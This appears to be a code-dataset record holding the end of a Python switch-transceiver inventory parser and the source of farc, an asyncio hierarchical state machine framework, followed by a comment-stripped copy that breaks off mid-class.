xcvr_n = get_offset(25)
elif self.match_version(platform__contains="2108"):
xcvr_n = get_offset(9)
else:
xcvr_n = get_offset(1)
with self.zynos_mode():
inv = self.cli("sys sw sfp disp")
rx_trans = re.compile(
r"SFP\s+:\s+(?P<number>\d+)\s*\n"
r"Vendor\s+:\s+(?P<vendor>\S+)\s*\n"
r"Part\sNumber\s+:\s+(?P<part_no>\S+\s*\S*)\s*\n"
r"Series\sNumber\s+:\s+(?P<serial>\S+)\s*\n"
r"Revision\s+:\s+(?P<rev>\S+)?\s*\n"
r"Transceiver\s+:\s+(?P<type>\S+)",
re.MULTILINE | re.DOTALL,
)
for match in rx_trans.finditer(inv):
try:
vendor = match.group("vendor").encode("utf-8")
except UnicodeDecodeError:
vendor = "NONAME"
try:
part_no = match.group("part_no").encode("utf-8").strip()
except UnicodeDecodeError:
part_no = "NoName | Transceiver | Unknown SFP"
part_no_orig = self.remove_non_ascii(match.group("part_no").strip())
if vendor in ["NONAME", "OEM", "CISCO-FINISAR", "AODevices"]:
part_no = "NoName | Transceiver | "
description = match.group("type")
if description.endswith(tuple([" EX", "-EX"])):
part_no = part_no + "1G | SFP EX"
elif description.endswith(tuple([" LH", "-LH"])):
part_no = part_no + "1G | SFP LH"
elif description.endswith(tuple([" LX", "-LX"])):
part_no = part_no + "1G | SFP LX"
elif description.endswith(tuple([" SX", "-SX"])):
part_no = part_no + "1G | SFP SX"
elif description.endswith(tuple([" T", "-T"])):
part_no = part_no + "1G | SFP T"
elif description.endswith(tuple([" TX", "-TX"])):
part_no = part_no + "1G | SFP TX"
elif description.endswith(tuple([" ZX", "-ZX"])):
part_no = part_no + "1G | SFP ZX"
elif part_no_orig.endswith(tuple(["BX-U", "BX-1"])):
part_no = part_no + "1G | SFP BXU"
elif part_no_orig.endswith("BX-D"):
part_no = part_no + "1G | SFP BXD"
else:
part_no = part_no + "Unknown SFP"
revision = self.remove_non_ascii(match.group("rev"), "") if match.group("rev") else None
o = {
"type": "XCVR",
"number": xcvr_n(match.group("number")),
"vendor": vendor,
"description": "%s (%s)" % (match.group("type"), vendor),
"part_no": [part_no.strip()],
"builtin": False,
}
if revision:
o["revision"] = revision
try:
o["serial"] = match.group("serial").encode("utf-8")
except UnicodeDecodeError:
pass
objects += [o]
return objects
| true | true |
79010c011c77fd4468e9ee2a11273d6bd3845d48 | 27,174 | py | Python | farc/__init__.py | SzeMengTan/farc | 26dfd85d6c888914c316c603f1ae3140d696ec84 | [
"MIT"
] | null | null | null | farc/__init__.py | SzeMengTan/farc | 26dfd85d6c888914c316c603f1ae3140d696ec84 | [
"MIT"
] | null | null | null | farc/__init__.py | SzeMengTan/farc | 26dfd85d6c888914c316c603f1ae3140d696ec84 | [
"MIT"
] | null | null | null | import asyncio
import collections
import math
import signal
import sys
from functools import wraps
class Spy(object):
"""Spy is the debugging system for farc.
farc contains a handful of Spy.on_*() methods
placed at useful locations in the framework.
It is up to a Spy driver (such as the included VcdSpy)
to implement the Spy.on_*() methods.
The programmer calls Spy.enable_spy(<Spy implementation class>)
to activate the Spy system; otherwise, Spy does nothing.
Therefore, this class is designed so that calling Spy.anything()
is inert unless the application first calls Spy.enable_spy()
"""
_actv_cls = None
@staticmethod
def enable_spy(spy_cls):
"""Sets the Spy to use the given class
and calls its initializer.
"""
Spy._actv_cls = spy_cls
spy_cls.init()
def __getattr__(*args):
"""Returns
1) the enable_spy static method if requested by name, or
2) the attribute from the active class (if active class was set), or
3) a function that swallows any arguments and does nothing.
"""
if args[1] == "enable_spy":
return Spy.enable_spy
if Spy._actv_cls:
return getattr(Spy._actv_cls, args[1])
return lambda *x: None
# Singleton pattern:
# Turn Spy into an instance of itself so __getattribute__ works
# on anyone who calls "import Spy; Spy.foo()"
# This prevents Spy() from creating a new instance
# and gives everyone who calls "import Spy" the same object
Spy = Spy()
class Signal(object):
"""An asynchronous stimulus that triggers reactions.
A unique identifier that, along with a value, specifies an Event.
p. 154
"""
_registry = {} # signame:str to sigid:int
_lookup = [] # sigid:int to signame:str
@staticmethod
def exists(signame):
"""Returns True if signame is in the Signal registry.
"""
return signame in Signal._registry
@staticmethod
def register(signame):
"""Registers the signame if it is not already registered.
Returns the signal number for the signame.
"""
assert type(signame) is str
if signame in Signal._registry:
# TODO: emit warning that signal is already registered
return Signal._registry[signame]
else:
sigid = len(Signal._lookup)
Signal._registry[signame] = sigid
Signal._lookup.append(signame)
Spy.on_signal_register(signame, sigid)
return sigid
def __getattr__(self, signame):
assert type(signame) is str
return Signal._registry[signame]
# Singleton pattern:
# Turn Signal into an instance of itself so getattr works.
# This also prevents Signal() from creating a new instance.
Signal = Signal()
# Register the reserved (system) signals
Signal.register("EMPTY") # 0
Signal.register("ENTRY") # 1
Signal.register("EXIT") # 2
Signal.register("INIT") # 3
# Signals that mirror POSIX signals
Signal.register("SIGINT") # (i.e. Ctrl+C)
Signal.register("SIGTERM") # (i.e. kill <pid>)
Event = collections.namedtuple("Event", ["signal", "value"])
Event.__doc__ = """Events are a tuple of (signal, value) that are passed from
one AHSM to another. Signals are defined in each AHSM's source code
by name, but resolve to a unique number. Values are any python value,
including containers that contain even more values. Each AHSM state
(static method) accepts an Event as the parameter and handles the event
based on its Signal."""
# Instantiate the reserved (system) events
Event.EMPTY = Event(Signal.EMPTY, None)
Event.ENTRY = Event(Signal.ENTRY, None)
Event.EXIT = Event(Signal.EXIT, None)
Event.INIT = Event(Signal.INIT, None)
# Events for POSIX signals
Event.SIGINT = Event(Signal.SIGINT, None) # (i.e. Ctrl+C)
Event.SIGTERM = Event(Signal.SIGTERM, None) # (i.e. kill <pid>)
# The order of this tuple MUST match their respective signals
Event.reserved = (Event.EMPTY, Event.ENTRY, Event.EXIT, Event.INIT)
class Hsm(object):
"""A Hierarchical State Machine (HSM).
Full support for hierarchical state nesting.
Guaranteed entry/exit action execution on arbitrary state transitions.
Full support of nested initial transitions.
Support for events with arbitrary parameters.
"""
# Every state handler must return one of these values
RET_HANDLED = 0
RET_IGNORED = 1
RET_TRAN = 2
RET_SUPER = 3
def __init__(self,):
"""Sets this Hsm's current state to Hsm.top(), the default state
and stores the given initial state.
"""
# self.state is the Hsm/act's current active state.
# This instance variable references the message handler (method)
# that will be called whenever a message is sent to this Hsm.
# We initialize this to self.top, the default message handler
self.state = self.top
# Farc differs from QP here in that we hardcode
# the initial state to be "_initial"
self.initial_state = self._initial
def _initial(self, event):
"""Raises a NotImplementedError to force the derived class
to implement its own initial state.
"""
raise NotImplementedError
def state(func):
"""A decorator that identifies which methods are states.
The presence of the farc_state attr, not the value of the attr,
determines statehood.
The Spy debugging system uses the farc_state attribute
to determine which methods inside a class are actually states.
Other uses of the attribute may come in the future.
"""
@wraps(func)
def func_wrap(self, evt):
result = func(self, evt)
Spy.on_state_handler_called(func_wrap, evt, result)
return result
setattr(func_wrap, "farc_state", True)
return staticmethod(func_wrap)
# Helper functions to process reserved events through the current state
@staticmethod
def trig(me, state_func, signal): return state_func(me, Event.reserved[signal])
@staticmethod
def enter(me, state_func): return state_func(me, Event.ENTRY)
@staticmethod
def exit(me, state_func): return state_func(me, Event.EXIT)
# Other helper functions
@staticmethod
def handled(me, event): return Hsm.RET_HANDLED
@staticmethod
def tran(me, nextState): me.state = nextState; return Hsm.RET_TRAN
@staticmethod
def super(me, superState): me.state = superState; return Hsm.RET_SUPER # p. 158
@state
def top(me, event):
"""This is the default state handler.
This handler ignores all signals except
the POSIX-like events, SIGINT/SIGTERM.
Handling SIGINT/SIGTERM here causes the Exit path
to be executed from the application's active state
to top/here.
The application may put something useful
or nothing at all in the Exit path.
"""
# Handle the Posix-like events to force the HSM
# to execute its Exit path all the way to the top
if Event.SIGINT == event:
return Hsm.RET_HANDLED
if Event.SIGTERM == event:
return Hsm.RET_HANDLED
# All other events are quietly ignored
return Hsm.RET_IGNORED # p. 165
@staticmethod
def _perform_init_chain(me, current):
"""Act on the chain of initializations required starting from current.
"""
t = current
while Hsm.trig(me, t if t != Hsm.top else me.initial_state, Signal.INIT) == Hsm.RET_TRAN:
# The state handles the INIT message and needs to make a transition. The
# "top" state is special in that it does not handle INIT messages, so we
# defer to me.initial_state in this case
path = [] # Trace the path back to t via superstates
while me.state != t:
path.append(me.state)
Hsm.trig(me, me.state, Signal.EMPTY)
# Restore the state to the target state
me.state = path[0]
assert len(path) < 32 # MAX_NEST_DEPTH
# Perform ENTRY action for each state from current to the target
path.reverse() # in-place
for s in path:
Hsm.enter(me, s)
# The target state has now to be checked to see if it responds to the INIT message
t = path[-1] # -1 because path was reversed
return t
@staticmethod
def _perform_transition(me, source, target):
# Handle the state transition from source to target in the HSM.
s, t = source, target
path = [t]
if s == t: # Case (a), transition to self
Hsm.exit(me,s)
Hsm.enter(me,t)
else:
# Find parent of target
Hsm.trig(me, t, Signal.EMPTY)
t = me.state # t is now parent of target
if s == t: # Case (b), source is parent of target
Hsm.enter(me, path[0])
else:
# Find parent of source
Hsm.trig(me, s, Signal.EMPTY)
if me.state == t: # Case (c), source and target share a parent
Hsm.exit(me, s)
Hsm.enter(me, path[0])
else:
if me.state == path[0]: # Case (d), target is parent of source
Hsm.exit(me, s)
else: # Check if the source is an ancestor of the target (case (e))
lca_found = False
path.append(t) # Populates path[1]
t = me.state # t is now parent of source
# Find and save ancestors of target into path
# until we find the source or hit the top
me.state = path[1]
while me.state != Hsm.top:
Hsm.trig(me, me.state, Signal.EMPTY)
path.append(me.state)
assert len(path) < 32 # MAX_NEST_DEPTH
if me.state == s:
lca_found = True
break
if lca_found: # This is case (e), enter states to get to target
for st in reversed(path[:-1]):
Hsm.enter(me, st)
else:
Hsm.exit(me, s) # Exit the source for cases (f), (g), (h)
me.state = t # Start at parent of the source
while me.state not in path:
# Keep exiting up into superstates until we reach the LCA.
# Depending on whether the EXIT signal is handled, we may also need
# to send the EMPTY signal to make me.state climb to the superstate.
if Hsm.exit(me, me.state) == Hsm.RET_HANDLED:
Hsm.trig(me, me.state, Signal.EMPTY)
t = me.state
# Step into children until we enter the target
for st in reversed(path[:path.index(t)]):
Hsm.enter(me, st)
@staticmethod
def init(me, event = None):
"""Transitions to the initial state. Follows any INIT transitions
from the inital state and performs ENTRY actions as it proceeds.
Use this to pass any parameters to initialize the state machine.
p. 172
"""
# TODO: The initial state MUST transition to another state
# The code that formerly did this was:
# status = me.initial_state(me, event)
# assert status == Hsm.RET_TRAN
# But the above code is commented out so an Ahsm's _initial()
# isn't executed twice.
me.state = Hsm._perform_init_chain(me, Hsm.top)
@staticmethod
def dispatch(me, event):
"""Dispatches the given event to this Hsm.
Follows the application's state transitions
until the event is handled or top() is reached
p. 174
"""
Spy.on_hsm_dispatch_event(event)
# Save the current state
t = me.state
# Proceed to superstates if event is not handled, we wish to find the superstate
# (if any) that does handle the event and to record the path to that state
exit_path = []
r = Hsm.RET_SUPER
while r == Hsm.RET_SUPER:
s = me.state
exit_path.append(s)
Spy.on_hsm_dispatch_pre(s)
r = s(me, event) # invoke state handler
# We leave the while loop with s at the state which was able to respond
# to the event, or to Hsm.top if none did
Spy.on_hsm_dispatch_post(exit_path)
# If the state handler for s requests a transition
if r == Hsm.RET_TRAN:
t = me.state
# Store target of transition
# Exit from the current state to the state s which handles
# the transition. We do not exit from s=exit_path[-1] itself.
for st in exit_path[:-1]:
r = Hsm.exit(me, st)
assert (r == Hsm.RET_SUPER) or (r == Hsm.RET_HANDLED)
s = exit_path[-1]
# Transition to t through the HSM
Hsm._perform_transition(me, s, t)
# Do initializations starting at t
t = Hsm._perform_init_chain(me, t)
# Restore the state
me.state = t
class Framework(object):
"""Framework is a composite class that holds:
- the asyncio event loop
- the registry of AHSMs
- the set of TimeEvents
- the handle to the next TimeEvent
- the table subscriptions to events
"""
_event_loop = asyncio.get_event_loop()
# The Framework maintains a registry of Ahsms in a list.
_ahsm_registry = []
# The Framework maintains a dict of priorities in use
# to prevent duplicates.
# An Ahsm's priority is checked against this dict
# within the Ahsm.start() method
# when the Ahsm is added to the Framework.
# The dict's key is the priority (integer) and the value is the Ahsm.
_priority_dict = {}
# The Framework maintains a group of TimeEvents in a dict. The next
# expiration of the TimeEvent is the key and the event is the value.
# Only the event with the next expiration time is scheduled for the
# timeEventCallback(). As TimeEvents are added and removed, the scheduled
# callback must be re-evaluated. Periodic TimeEvents should only have
# one entry in the dict: the next expiration. The timeEventCallback() will
# add a Periodic TimeEvent back into the dict with its next expiration.
_time_events = {}
# When a TimeEvent is scheduled for the timeEventCallback(),
# a handle is kept so that the callback may be cancelled if necessary.
_tm_event_handle = None
# The Subscriber Table is a dictionary. The keys are signals.
# The value for each key is a list of Ahsms that are subscribed to the
# signal. An Ahsm may subscribe to a signal at any time during runtime.
_subscriber_table = {}
@staticmethod
def post(event, act):
"""Posts the event to the given Ahsm's event queue.
The argument, act, is an Ahsm instance.
"""
assert isinstance(act, Ahsm)
act.postFIFO(event)
@staticmethod
def post_by_name(event, act_name):
"""Posts the event to the given Ahsm's event queue.
The argument, act, is a string of the name of the class
to which the event is sent. The event will post to all actors
having the given classname.
"""
assert type(act_name) is str
for act in Framework._ahsm_registry:
if act.__class__.__name__ == act_name:
act.postFIFO(event)
@staticmethod
def publish(event):
"""Posts the event to the message queue of every Ahsm
that is subscribed to the event's signal.
"""
if event.signal in Framework._subscriber_table:
for act in Framework._subscriber_table[event.signal]:
act.postFIFO(event)
# Run to completion
Framework._event_loop.call_soon_threadsafe(Framework.run)
@staticmethod
def subscribe(signame, act):
"""Adds the given Ahsm to the subscriber table list
for the given signal. The argument, signame, is a string of the name
of the Signal to which the Ahsm is subscribing. Using a string allows
the Signal to be created in the registry if it is not already.
"""
sigid = Signal.register(signame)
if sigid not in Framework._subscriber_table:
Framework._subscriber_table[sigid] = []
Framework._subscriber_table[sigid].append(act)
@staticmethod
def addTimeEvent(tm_event, delta):
"""Adds the TimeEvent to the list of time events in the Framework.
The event will fire its signal (to the TimeEvent's target Ahsm)
after the delay, delta.
"""
expiration = Framework._event_loop.time() + delta
Framework.addTimeEventAt(tm_event, expiration)
@staticmethod
def addTimeEventAt(tm_event, abs_time):
"""Adds the TimeEvent to the list of time events in the Framework.
The event will fire its signal (to the TimeEvent's target Ahsm)
at the given absolute time (_event_loop.time()).
"""
assert tm_event not in Framework._time_events.values()
Framework._insortTimeEvent(tm_event, abs_time)
@staticmethod
def _insortTimeEvent(tm_event, expiration):
"""Inserts a TimeEvent into the list of time events,
sorted by the next expiration of the timer.
If the expiration time matches an existing expiration,
we add the smallest amount of time to the given expiration
to avoid a key collision in the Dict
and make the identically-timed events fire in a FIFO fashion.
"""
# If the event is to happen in the past, post it now
now = Framework._event_loop.time()
if expiration < now:
tm_event.act.postFIFO(tm_event)
# TODO: if periodic, need to schedule next?
# If an event already occupies this expiration time,
# increase this event's expiration by the smallest measurable amount
while expiration in Framework._time_events.keys():
m, e = math.frexp(expiration)
expiration = (m + sys.float_info.epsilon) * 2**e
Framework._time_events[expiration] = tm_event
# If this is the only active TimeEvent, schedule its callback
if len(Framework._time_events) == 1:
Framework._tm_event_handle = Framework._event_loop.call_at(
expiration, Framework.timeEventCallback, tm_event, expiration)
# If there are other TimeEvents,
# check if this one should replace the scheduled one
else:
if expiration < min(Framework._time_events.keys()):
Framework._tm_event_handle.cancel()
Framework._tm_event_handle = Framework._event_loop.call_at(
expiration, Framework.timeEventCallback, tm_event,
expiration)
@staticmethod
def removeTimeEvent(tm_event):
"""Removes the TimeEvent from the list of active time events.
Cancels the TimeEvent's callback if there is one.
Schedules the next event's callback if there is one.
"""
for k,v in Framework._time_events.items():
if v is tm_event:
# If the event being removed is scheduled for callback,
# cancel and schedule the next event if there is one
if k == min(Framework._time_events.keys()):
del Framework._time_events[k]
if Framework._tm_event_handle:
Framework._tm_event_handle.cancel()
if len(Framework._time_events) > 0:
next_expiration = min(Framework._time_events.keys())
next_event = Framework._time_events[next_expiration]
Framework._tm_event_handle = \
Framework._event_loop.call_at(
next_expiration, Framework.timeEventCallback,
next_event, next_expiration)
else:
Framework._tm_event_handle = None
else:
del Framework._time_events[k]
break
@staticmethod
def timeEventCallback(tm_event, expiration):
"""The callback function for all TimeEvents.
Posts the event to the event's target Ahsm.
If the TimeEvent is periodic, re-insort the event
in the list of active time events.
"""
assert expiration in Framework._time_events.keys(), (
"Exp:%d _time_events.keys():%s" %
(expiration, Framework._time_events.keys()))
# Remove this expired TimeEvent from the active list
del Framework._time_events[expiration]
Framework._tm_event_handle = None
# Post the event to the target Ahsm
tm_event.act.postFIFO(tm_event)
# If this is a periodic time event, schedule its next expiration
if tm_event.interval > 0:
Framework._insortTimeEvent(tm_event,
expiration + tm_event.interval)
# If not set already and there are more events, set the next event callback
if (Framework._tm_event_handle == None and
len(Framework._time_events) > 0):
next_expiration = min(Framework._time_events.keys())
next_event = Framework._time_events[next_expiration]
Framework._tm_event_handle = Framework._event_loop.call_at(
next_expiration, Framework.timeEventCallback, next_event,
next_expiration)
# Run to completion
Framework._event_loop.call_soon_threadsafe(Framework.run)
@staticmethod
def add(act):
"""Makes the framework aware of the given Ahsm.
"""
Framework._ahsm_registry.append(act)
assert act.priority not in Framework._priority_dict, (
"Priority MUST be unique")
Framework._priority_dict[act.priority] = act
Spy.on_framework_add(act)
@staticmethod
def run():
"""Dispatches an event to the highest priority Ahsm
until all event queues are empty (i.e. Run To Completion).
"""
getPriority = lambda x : x.priority
while True:
allQueuesEmpty = True
sorted_acts = sorted(Framework._ahsm_registry, key=getPriority)
for act in sorted_acts:
if act.has_msgs():
event_next = act.pop_msg()
act.dispatch(act, event_next)
allQueuesEmpty = False
break
if allQueuesEmpty:
return
@staticmethod
def stop():
"""EXITs all Ahsms and stops the event loop.
"""
# Disable the timer callback
if Framework._tm_event_handle:
Framework._tm_event_handle.cancel()
Framework._tm_event_handle = None
# Post EXIT to all Ahsms
for act in Framework._ahsm_registry:
Framework.post(Event.EXIT, act)
# Run to completion and stop the asyncio event loop
Framework.run()
Framework._event_loop.stop()
Spy.on_framework_stop()
@staticmethod
def print_info():
"""Prints the name and current state
of each actor in the framework.
Meant to be called when ctrl+T (SIGINFO/29) is issued.
"""
for act in Framework._ahsm_registry:
print(act.__class__.__name__, act.state.__name__)
# Bind a useful set of POSIX signals to the handler
# (ignore a NotImplementedError on Windows)
try:
_event_loop.add_signal_handler(signal.SIGINT, lambda: Framework.stop())
_event_loop.add_signal_handler(signal.SIGTERM, lambda: Framework.stop())
_event_loop.add_signal_handler(29, print_info.__func__)
except NotImplementedError:
pass
def run_forever():
"""Runs the asyncio event loop with and
ensures state machines are exited upon a KeyboardInterrupt.
"""
loop = asyncio.get_event_loop()
try:
loop.run_forever()
except KeyboardInterrupt:
Framework.stop()
loop.close()
class Ahsm(Hsm):
"""An Augmented Hierarchical State Machine (AHSM); a.k.a. ActiveObject/AO.
Adds a priority, message queue and methods to work with the queue.
"""
def start(self, priority, initEvent=None):
# must set the priority before Framework.add() which uses the priority
self.priority = priority
Framework.add(self)
self.mq = collections.deque()
self.init(self, initEvent)
# Run to completion
Framework._event_loop.call_soon_threadsafe(Framework.run)
def postLIFO(self, evt):
self.mq.append(evt)
def postFIFO(self, evt):
self.mq.appendleft(evt)
def pop_msg(self,):
return self.mq.pop()
def has_msgs(self,):
return len(self.mq) > 0
class TimeEvent(object):
"""TimeEvent is a composite class that contains an Event.
A TimeEvent is created by the application and added to the Framework.
The Framework then emits the event after the given delay.
A one-shot TimeEvent is created by calling either postAt() or postIn().
A periodic TimeEvent is created by calling the postEvery() method.
"""
def __init__(self, signame):
assert type(signame) == str
self.signal = Signal.register(signame)
self.value = None
def postAt(self, act, abs_time):
"""Posts this TimeEvent to the given Ahsm at a specified time.
"""
assert issubclass(type(act), Ahsm)
self.act = act
self.interval = 0
Framework.addTimeEventAt(self, abs_time)
def postIn(self, act, delta):
"""Posts this TimeEvent to the given Ahsm after the time delta.
"""
assert issubclass(type(act), Ahsm)
self.act = act
self.interval = 0
Framework.addTimeEvent(self, delta)
def postEvery(self, act, delta):
"""Posts this TimeEvent to the given Ahsm after the time delta
and every time delta thereafter until disarmed.
"""
assert issubclass(type(act), Ahsm)
self.act = act
self.interval = delta
Framework.addTimeEvent(self, delta)
def disarm(self):
"""Removes this TimeEvent from the Framework's active time events.
"""
self.act = None
Framework.removeTimeEvent(self)
from .VcdSpy import VcdSpy
| 37.072306 | 101 | 0.614668 | import asyncio
import collections
import math
import signal
import sys
from functools import wraps
class Spy(object):
_actv_cls = None
@staticmethod
def enable_spy(spy_cls):
Spy._actv_cls = spy_cls
spy_cls.init()
def __getattr__(*args):
if args[1] == "enable_spy":
return Spy.enable_spy
if Spy._actv_cls:
return getattr(Spy._actv_cls, args[1])
return lambda *x: None
Spy = Spy()
class Signal(object):
_registry = {}
_lookup = []
@staticmethod
def exists(signame):
return signame in Signal._registry
@staticmethod
def register(signame):
assert type(signame) is str
if signame in Signal._registry:
return Signal._registry[signame]
else:
sigid = len(Signal._lookup)
Signal._registry[signame] = sigid
Signal._lookup.append(signame)
Spy.on_signal_register(signame, sigid)
return sigid
def __getattr__(self, signame):
assert type(signame) is str
return Signal._registry[signame]
Signal = Signal()
Signal.register("EMPTY")
Signal.register("ENTRY")
Signal.register("EXIT")
Signal.register("INIT")
Signal.register("SIGINT")
Signal.register("SIGTERM")
Event = collections.namedtuple("Event", ["signal", "value"])
Event.__doc__ = """Events are a tuple of (signal, value) that are passed from
one AHSM to another. Signals are defined in each AHSM's source code
by name, but resolve to a unique number. Values are any python value,
including containers that contain even more values. Each AHSM state
(static method) accepts an Event as the parameter and handles the event
based on its Signal."""
# Instantiate the reserved (system) events
Event.EMPTY = Event(Signal.EMPTY, None)
Event.ENTRY = Event(Signal.ENTRY, None)
Event.EXIT = Event(Signal.EXIT, None)
Event.INIT = Event(Signal.INIT, None)
# Events for POSIX signals
Event.SIGINT = Event(Signal.SIGINT, None) # (i.e. Ctrl+C)
Event.SIGTERM = Event(Signal.SIGTERM, None) # (i.e. kill <pid>)
# The order of this tuple MUST match their respective signals
Event.reserved = (Event.EMPTY, Event.ENTRY, Event.EXIT, Event.INIT)
class Hsm(object):
# Every state handler must return one of these values
RET_HANDLED = 0
RET_IGNORED = 1
RET_TRAN = 2
RET_SUPER = 3
def __init__(self,):
# self.state is the Hsm/act's current active state.
self.state = self.top
self.initial_state = self._initial
def _initial(self, event):
raise NotImplementedError
def state(func):
@wraps(func)
def func_wrap(self, evt):
result = func(self, evt)
Spy.on_state_handler_called(func_wrap, evt, result)
return result
setattr(func_wrap, "farc_state", True)
return staticmethod(func_wrap)
@staticmethod
def trig(me, state_func, signal): return state_func(me, Event.reserved[signal])
@staticmethod
def enter(me, state_func): return state_func(me, Event.ENTRY)
@staticmethod
def exit(me, state_func): return state_func(me, Event.EXIT)
@staticmethod
def handled(me, event): return Hsm.RET_HANDLED
@staticmethod
def tran(me, nextState): me.state = nextState; return Hsm.RET_TRAN
@staticmethod
def super(me, superState): me.state = superState; return Hsm.RET_SUPER
@state
def top(me, event):
if Event.SIGINT == event:
return Hsm.RET_HANDLED
if Event.SIGTERM == event:
return Hsm.RET_HANDLED
return Hsm.RET_IGNORED
@staticmethod
def _perform_init_chain(me, current):
t = current
while Hsm.trig(me, t if t != Hsm.top else me.initial_state, Signal.INIT) == Hsm.RET_TRAN:
path = []
while me.state != t:
path.append(me.state)
Hsm.trig(me, me.state, Signal.EMPTY)
me.state = path[0]
assert len(path) < 32
path.reverse()
for s in path:
Hsm.enter(me, s)
t = path[-1]
return t
@staticmethod
def _perform_transition(me, source, target):
s, t = source, target
path = [t]
if s == t:
Hsm.exit(me,s)
Hsm.enter(me,t)
else:
Hsm.trig(me, t, Signal.EMPTY)
t = me.state
if s == t:
Hsm.enter(me, path[0])
else:
Hsm.trig(me, s, Signal.EMPTY)
if me.state == t:
Hsm.exit(me, s)
Hsm.enter(me, path[0])
else:
if me.state == path[0]:
Hsm.exit(me, s)
else:
lca_found = False
path.append(t)
t = me.state
me.state = path[1]
while me.state != Hsm.top:
Hsm.trig(me, me.state, Signal.EMPTY)
path.append(me.state)
assert len(path) < 32
if me.state == s:
lca_found = True
break
if lca_found:
for st in reversed(path[:-1]):
Hsm.enter(me, st)
else:
Hsm.exit(me, s)
me.state = t
while me.state not in path:
if Hsm.exit(me, me.state) == Hsm.RET_HANDLED:
Hsm.trig(me, me.state, Signal.EMPTY)
t = me.state
for st in reversed(path[:path.index(t)]):
Hsm.enter(me, st)
@staticmethod
def init(me, event = None):
# isn't executed twice.
me.state = Hsm._perform_init_chain(me, Hsm.top)
@staticmethod
def dispatch(me, event):
Spy.on_hsm_dispatch_event(event)
t = me.state
exit_path = []
r = Hsm.RET_SUPER
while r == Hsm.RET_SUPER:
s = me.state
exit_path.append(s)
Spy.on_hsm_dispatch_pre(s)
r = s(me, event)
Spy.on_hsm_dispatch_post(exit_path)
if r == Hsm.RET_TRAN:
t = me.state
for st in exit_path[:-1]:
r = Hsm.exit(me, st)
assert (r == Hsm.RET_SUPER) or (r == Hsm.RET_HANDLED)
s = exit_path[-1]
Hsm._perform_transition(me, s, t)
t = Hsm._perform_init_chain(me, t)
me.state = t
class Framework(object):
_event_loop = asyncio.get_event_loop()
_ahsm_registry = []
# within the Ahsm.start() method
# when the Ahsm is added to the Framework.
# The dict's key is the priority (integer) and the value is the Ahsm.
_priority_dict = {}
_time_events = {}
_tm_event_handle = None
_subscriber_table = {}
@staticmethod
def post(event, act):
assert isinstance(act, Ahsm)
act.postFIFO(event)
@staticmethod
def post_by_name(event, act_name):
assert type(act_name) is str
for act in Framework._ahsm_registry:
if act.__class__.__name__ == act_name:
act.postFIFO(event)
@staticmethod
def publish(event):
if event.signal in Framework._subscriber_table:
for act in Framework._subscriber_table[event.signal]:
act.postFIFO(event)
Framework._event_loop.call_soon_threadsafe(Framework.run)
@staticmethod
def subscribe(signame, act):
sigid = Signal.register(signame)
if sigid not in Framework._subscriber_table:
Framework._subscriber_table[sigid] = []
Framework._subscriber_table[sigid].append(act)
@staticmethod
def addTimeEvent(tm_event, delta):
expiration = Framework._event_loop.time() + delta
Framework.addTimeEventAt(tm_event, expiration)
@staticmethod
def addTimeEventAt(tm_event, abs_time):
assert tm_event not in Framework._time_events.values()
Framework._insortTimeEvent(tm_event, abs_time)
@staticmethod
def _insortTimeEvent(tm_event, expiration):
now = Framework._event_loop.time()
if expiration < now:
tm_event.act.postFIFO(tm_event)
while expiration in Framework._time_events.keys():
m, e = math.frexp(expiration)
expiration = (m + sys.float_info.epsilon) * 2**e
Framework._time_events[expiration] = tm_event
# If this is the only active TimeEvent, schedule its callback
if len(Framework._time_events) == 1:
Framework._tm_event_handle = Framework._event_loop.call_at(
expiration, Framework.timeEventCallback, tm_event, expiration)
# If there are other TimeEvents,
# check if this one should replace the scheduled one
else:
if expiration < min(Framework._time_events.keys()):
Framework._tm_event_handle.cancel()
Framework._tm_event_handle = Framework._event_loop.call_at(
expiration, Framework.timeEventCallback, tm_event,
expiration)
@staticmethod
def removeTimeEvent(tm_event):
for k,v in Framework._time_events.items():
if v is tm_event:
# If the event being removed is scheduled for callback,
# cancel and schedule the next event if there is one
if k == min(Framework._time_events.keys()):
del Framework._time_events[k]
if Framework._tm_event_handle:
Framework._tm_event_handle.cancel()
if len(Framework._time_events) > 0:
next_expiration = min(Framework._time_events.keys())
next_event = Framework._time_events[next_expiration]
Framework._tm_event_handle = \
Framework._event_loop.call_at(
next_expiration, Framework.timeEventCallback,
next_event, next_expiration)
else:
Framework._tm_event_handle = None
else:
del Framework._time_events[k]
break
@staticmethod
def timeEventCallback(tm_event, expiration):
assert expiration in Framework._time_events.keys(), (
"Exp:%d _time_events.keys():%s" %
(expiration, Framework._time_events.keys()))
# Remove this expired TimeEvent from the active list
del Framework._time_events[expiration]
Framework._tm_event_handle = None
# Post the event to the target Ahsm
tm_event.act.postFIFO(tm_event)
# If this is a periodic time event, schedule its next expiration
if tm_event.interval > 0:
Framework._insortTimeEvent(tm_event,
expiration + tm_event.interval)
# If not set already and there are more events, set the next event callback
if (Framework._tm_event_handle == None and
len(Framework._time_events) > 0):
next_expiration = min(Framework._time_events.keys())
next_event = Framework._time_events[next_expiration]
Framework._tm_event_handle = Framework._event_loop.call_at(
next_expiration, Framework.timeEventCallback, next_event,
next_expiration)
# Run to completion
Framework._event_loop.call_soon_threadsafe(Framework.run)
@staticmethod
def add(act):
Framework._ahsm_registry.append(act)
assert act.priority not in Framework._priority_dict, (
"Priority MUST be unique")
Framework._priority_dict[act.priority] = act
Spy.on_framework_add(act)
@staticmethod
def run():
getPriority = lambda x : x.priority
while True:
allQueuesEmpty = True
sorted_acts = sorted(Framework._ahsm_registry, key=getPriority)
for act in sorted_acts:
if act.has_msgs():
event_next = act.pop_msg()
act.dispatch(act, event_next)
allQueuesEmpty = False
break
if allQueuesEmpty:
return
@staticmethod
def stop():
# Disable the timer callback
if Framework._tm_event_handle:
Framework._tm_event_handle.cancel()
Framework._tm_event_handle = None
# Post EXIT to all Ahsms
for act in Framework._ahsm_registry:
Framework.post(Event.EXIT, act)
# Run to completion and stop the asyncio event loop
Framework.run()
Framework._event_loop.stop()
Spy.on_framework_stop()
@staticmethod
def print_info():
for act in Framework._ahsm_registry:
print(act.__class__.__name__, act.state.__name__)
# Bind a useful set of POSIX signals to the handler
# (ignore a NotImplementedError on Windows)
try:
_event_loop.add_signal_handler(signal.SIGINT, lambda: Framework.stop())
_event_loop.add_signal_handler(signal.SIGTERM, lambda: Framework.stop())
_event_loop.add_signal_handler(29, print_info.__func__)
except NotImplementedError:
pass
def run_forever():
loop = asyncio.get_event_loop()
try:
loop.run_forever()
except KeyboardInterrupt:
Framework.stop()
loop.close()
class Ahsm(Hsm):
def start(self, priority, initEvent=None):
